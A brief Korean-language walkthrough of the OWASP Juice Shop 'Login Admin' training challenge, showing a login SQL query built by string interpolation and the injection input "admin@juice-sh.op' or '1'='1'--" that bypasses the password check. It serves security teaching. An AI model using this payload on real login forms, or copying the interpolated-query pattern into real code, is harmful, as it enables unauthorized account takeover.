OWASP Juice Shop - Login Admin (Injection)

 

만일 로그인 쿼리문이 아래와 같다. 

SELECT * FROM Users WHERE email = '${req.body.email || ''}' AND password = '${security.hash(req.body.password || '')}' AND deletedAt IS NULL

"admin@juice-sh.op' or '1'='1'--"를 입력한다면

 

SELECT * FROM Users WHERE email = 'admin@juice-sh.op' or '1'='1'--' AND password = '${security.hash(req.body.password || '')}' AND deletedAt IS NULL

쿼리문의 결과가 참이 되면서 로그인이 성공한다.